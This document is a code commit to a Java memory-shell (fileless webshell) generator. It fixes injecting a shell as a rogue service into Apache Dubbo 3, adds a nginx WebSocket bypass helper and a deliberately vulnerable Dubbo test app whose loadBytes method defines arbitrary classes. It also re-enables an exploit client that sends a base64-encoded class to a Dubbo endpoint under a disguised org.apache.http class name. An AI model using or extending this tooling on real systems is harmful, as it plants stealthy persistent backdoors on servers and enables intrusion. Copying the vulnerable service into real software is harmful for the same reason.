fix: dubbo3 inject failed

Author: ReaJason

generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java

@@ -64,19 +64,24 @@ public static MemShellResult generate(ShellConfig shellConfig, InjectorConfig in
         byte[] shellBytes = ShellToolFactory.generateBytes(shellConfig, shellToolConfig);
 
         if (ShellType.DUBBO_SERVICE.equals(shellConfig.getShellType())) {
-            String interfaceName = shellToolConfig.getShellClassName() + "$1";
+            String packageName = CommonUtil.getPackageName(shellToolConfig.getShellClassName());
+            String simpleName = CommonUtil.getSimpleName(shellToolConfig.getShellClassName());
+            String interfaceName = packageName + ".I" + simpleName;
+            injectorConfig.setInjectorHelperClassName(interfaceName);
             injectorConfig.setHelperClassBytes(DubboServiceInterfaceHelperGenerator.getBytes(interfaceName, shellConfig));
             shellBytes = ClassInterfaceUtils.addInterface(shellBytes, interfaceName);
             String urlPattern = injectorConfig.getUrlPattern();
             if (Strings.CS.equalsAny(urlPattern, "/*", "/")
                     || StringUtils.isBlank(urlPattern)) {
-                injectorConfig.setUrlPattern(shellToolConfig.getShellClassName());
+                injectorConfig.setUrlPattern(interfaceName);
             }
         }
 
         if (ShellType.BYPASS_NGINX_WEBSOCKET.equals(shellConfig.getShellType())
                 || ShellType.JAKARTA_BYPASS_NGINX_WEBSOCKET.equals(shellConfig.getShellType())) {
-            injectorConfig.setHelperClassBytes(WebSocketByPassHelperGenerator.getBytes(shellConfig, shellToolConfig));
+            String helperClassName = shellToolConfig.getShellClassName() + "$1";
+            injectorConfig.setInjectorHelperClassName(helperClassName);
+            injectorConfig.setHelperClassBytes(WebSocketByPassHelperGenerator.getBytes(helperClassName, shellConfig, shellToolConfig));
         }
 
         injectorConfig.setInjectorClass(injectorClass);

generator/src/main/java/com/reajason/javaweb/memshell/config/InjectorConfig.java

@@ -43,6 +43,11 @@ public class InjectorConfig {
      */
     private byte[] shellClassBytes;
 
+    /**
+     * 辅助类类名
+     */
+    private String injectorHelperClassName;
+
     /**
      * 辅助类字节码
      */

generator/src/main/java/com/reajason/javaweb/memshell/generator/WebSocketByPassHelperGenerator.java

@@ -18,7 +18,7 @@
  * @since 2026/1/13
  */
 public class WebSocketByPassHelperGenerator {
-    public static byte[] getBytes(ShellConfig shellConfig, ShellToolConfig shellToolConfig) {
+    public static byte[] getBytes(String helperClassName, ShellConfig shellConfig, ShellToolConfig shellToolConfig) {
         Pair<String, String> headerPair = getHeaderPair(shellToolConfig);
         if (headerPair == null) {
             throw new GenerationException("unsupported shell config: " + shellConfig.getShellTool());
@@ -30,7 +30,7 @@ public static byte[] getBytes(ShellConfig shellConfig, ShellToolConfig shellTool
                     .visit(new TargetJreVersionVisitorWrapper(shellConfig.getTargetJreVersion()))
                     .field(named("headerName")).value(headerPair.getKey())
                     .field(named("headerValue")).value(headerPair.getValue())
-                    .name(shellToolConfig.getShellClassName() + "$1");
+                    .name(helperClassName);
             if (shellConfig.isJakarta()) {
                 builder = builder.visit(ServletRenameVisitorWrapper.INSTANCE);
             }

generator/src/main/java/com/reajason/javaweb/memshell/injector/dubbo/DubboServiceInjector.java

@@ -6,7 +6,6 @@
 import org.apache.dubbo.config.ProtocolConfig;
 import org.apache.dubbo.config.RegistryConfig;
 import org.apache.dubbo.config.ServiceConfig;
-import org.apache.dubbo.config.ServiceConfigBase;
 import org.apache.dubbo.config.context.ConfigManager;
 import org.apache.dubbo.rpc.model.ApplicationModel;
 
@@ -152,9 +151,43 @@ public String registerService() throws Throwable {
         }
     }
 
+    @SuppressWarnings("all")
     private boolean isPathRegisteredInFramework(String path) {
-        Collection<ServiceConfigBase> services = ApplicationModel.getConfigManager().getServices();
-        return services.stream().anyMatch(s -> path.equals(s.getPath()));
+        try {
+            for (Object service : getRegisteredServices()) {
+                try {
+                    Method getPath = service.getClass().getMethod("getPath");
+                    if (path.equals(getPath.invoke(service))) {
+                        return true;
+                    }
+                } catch (Exception ignored) {
+                }
+            }
+        } catch (Exception ignored) {
+        }
+        return false;
+    }
+
+    @SuppressWarnings("all")
+    private Collection<?> getRegisteredServices() {
+        try {
+            ConfigManager configManager = ApplicationModel.getConfigManager();
+            Method getServices = configManager.getClass().getMethod("getServices");
+            return (Collection<?>) getServices.invoke(configManager);
+        } catch (Exception e) {
+            try {
+                Method defaultModel = ApplicationModel.class.getMethod("defaultModel");
+                Object model = defaultModel.invoke(null);
+                Method getDefaultModule = model.getClass().getMethod("getDefaultModule");
+                Object moduleModel = getDefaultModule.invoke(model);
+                Method getConfigManager = moduleModel.getClass().getMethod("getConfigManager");
+                Object moduleConfigManager = getConfigManager.invoke(moduleModel);
+                Method getServices = moduleConfigManager.getClass().getMethod("getServices");
+                return (Collection<?>) getServices.invoke(moduleConfigManager);
+            } catch (Exception ex) {
+                return new ArrayList<>();
+            }
+        }
     }
 
     private String normalizePath(String path) {
@@ -200,6 +233,7 @@ private ServiceConfig<Object> createServiceConfig(String path, Class<?> interfac
         serviceConfig.setRef(serviceInstance);
         serviceConfig.setPath(path);
         serviceConfig.setVersion("1.0.0");
+        serviceConfig.setProxy("jdk");
         serviceConfig.setApplication(configManager.getApplication().orElse(null));
 
         List<ProtocolConfig> protocols = new ArrayList<>(configManager.getDefaultProtocols());

generator/src/main/java/com/reajason/javaweb/utils/CommonUtil.java

@@ -145,7 +145,7 @@ public static String generateShellClassName(String server, String shellType) {
                 + "." + MIDDLEWARE_NAMES[new Random().nextInt(MIDDLEWARE_NAMES.length)] + shellType;
     }
 
-    public static String getSimpleName(String injectorClassName) {
-        return injectorClassName.substring(injectorClassName.lastIndexOf(".") + 1);
+    public static String getSimpleName(String className) {
+        return className.substring(className.lastIndexOf(".") + 1);
     }
 }

settings.gradle.kts

@@ -35,6 +35,7 @@ include("generator")
 include("thirdparty:thirdparty-tomcat")
 include("integration-test")
 include("vul:vul-dubbo278")
+include("vul:vul-dubbo315")
 include("vul:vul-webapp")
 include("vul:vul-webapp-jakarta")
 include("vul:vul-webapp-expression")

…aweb/vuldubbo278/DefaultDemoService.java …on/javaweb/dubbo/DefaultDemoService.javavul/vul-dubbo278/src/main/java/com/reajason/javaweb/vuldubbo278/DefaultDemoService.java renamed to vul/vul-dubbo278/src/main/java/com/reajason/javaweb/dubbo/DefaultDemoService.java vul/vul-dubbo278/src/main/java/com/reajason/javaweb/vuldubbo278/DefaultDemoService.java renamed to vul/vul-dubbo278/src/main/java/com/reajason/javaweb/dubbo/DefaultDemoService.java

@@ -1,15 +1,11 @@
-package com.reajason.javaweb.vuldubbo278;
+package com.reajason.javaweb.dubbo;
 
-import org.apache.dubbo.common.bytecode.ClassGenerator;
-import org.apache.dubbo.common.utils.ClassUtils;
 import org.apache.dubbo.config.annotation.DubboService;
 import org.springframework.beans.factory.annotation.Value;
 
 @DubboService(version = "1.0.0", path = "demo_say_hello")
 public class DefaultDemoService extends ClassLoader implements DemoService {
 
-    private final DubboServiceInjector dubboServiceInjector = new DubboServiceInjector();
-
     /**
      * The default value of ${dubbo.application.name} is ${spring.application.name}
      */
@@ -35,9 +31,4 @@ public String loadBytes(byte[] bytes) {
         }
         return o.toString();
     }
-
-    @Override
-    public String registerService(String path, String interfaceClassName, String implementationClassName) {
-        return dubboServiceInjector.registerService(path, interfaceClassName, implementationClassName);
-    }
 }

vul/vul-dubbo278/src/main/java/com/reajason/javaweb/dubbo/DemoService.java

@@ -0,0 +1,9 @@
+package com.reajason.javaweb.dubbo;
+
+public interface DemoService {
+
+    String sayHello(String name);
+
+    String loadBytes(byte[] bytes);
+
+}

…son/javaweb/vuldubbo278/ProbeClient.java …/reajason/javaweb/dubbo/ProbeClient.javavul/vul-dubbo278/src/main/java/com/reajason/javaweb/vuldubbo278/ProbeClient.java renamed to vul/vul-dubbo278/src/main/java/com/reajason/javaweb/dubbo/ProbeClient.java vul/vul-dubbo278/src/main/java/com/reajason/javaweb/vuldubbo278/ProbeClient.java renamed to vul/vul-dubbo278/src/main/java/com/reajason/javaweb/dubbo/ProbeClient.java

@@ -1,4 +1,4 @@
-package com.reajason.javaweb.vuldubbo278;
+package com.reajason.javaweb.dubbo;
 
 import com.caucho.hessian.client.HessianProxyFactory;
 import com.caucho.hessian.io.HessianRemoteObject;
@@ -18,11 +18,11 @@ public class ProbeClient {
 
     public static void main(String[] args) throws Exception {
 //        dubboSayHello("dubbo://127.0.0.1:12345/demo_say_hello");
-//        try {
-//            dubboExploit();
-//        } catch (Exception e) {
-//            e.printStackTrace();
-//        }
+        try {
+            dubboExploit();
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
 //        exploit();
     }
 
@@ -58,9 +58,9 @@ public static void dubboSayHello(String url) {
     }
 
     public static void dubboExploit() throws Exception {
-        String url = "dubbo://192.168.31.206:12345/org.apache.http.web.handlers.wJMhG.OAuthDubboService";
-        String b = "H4sIAAAAAAAA/zv1b9c+BgYGEwZ2Rgaz/KJ0/cSCxOSMVP2MkpIC/fLUJP2MxLyUnNSiYv1yL98Md31/x9KSDJfSpKT84NSisszkVBVDdgZGRgaBrMSyRP2cxLx0ff+krNTkEnYGZkYGNohuIEMj2kkz2omNkYGJgYUBBBhZGBlYGdhATAD+bjiShAAAAA==";
-        byte[] bytes = gzipDecompress(Base64.getDecoder().decode(b));
+        String url = "dubbo://198.18.0.1:50051/org.apache.http.web.handlers.VTcIU.AuthDubboService";
+        String b = "yv66vgAAADQABwEANW9yZy9hcGFjaGUvaHR0cC93ZWIvaGFuZGxlcnMvVlRjSVUvQXV0aER1YmJvU2VydmljZSQxBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEABmhhbmRsZQEABihbQilbQgYBAAIABAAAAAAAAQQBAAUABgAAAAA=";
+        byte[] bytes = Base64.getDecoder().decode(b);
         Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
         defineClass.setAccessible(true);
         ClassLoader classLoader = ClassGenerator.class.getClassLoader();
@@ -70,6 +70,7 @@ public static void dubboExploit() throws Exception {
         reference.setApplication(new ApplicationConfig("dubbo-consumer"));
         reference.setInterface(clazz);
         reference.setVersion("1.0.0");
+        reference.setProxy("jdk");
         reference.setUrl(url);
 
         try {

…/vuldubbo278/VulDubbo278Application.java …avaweb/dubbo/VulDubbo278Application.javavul/vul-dubbo278/src/main/java/com/reajason/javaweb/vuldubbo278/VulDubbo278Application.java renamed to vul/vul-dubbo278/src/main/java/com/reajason/javaweb/dubbo/VulDubbo278Application.java vul/vul-dubbo278/src/main/java/com/reajason/javaweb/vuldubbo278/VulDubbo278Application.java renamed to vul/vul-dubbo278/src/main/java/com/reajason/javaweb/dubbo/VulDubbo278Application.java

@@ -1,11 +1,7 @@
-package com.reajason.javaweb.vuldubbo278;
+package com.reajason.javaweb.dubbo;
 
-import org.springframework.boot.ApplicationRunner;
 import org.springframework.boot.SpringApplication;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
-import org.springframework.context.annotation.Bean;
-
-import javax.script.ScriptEngineManager;
 
 @SpringBootApplication
 public class VulDubbo278Application {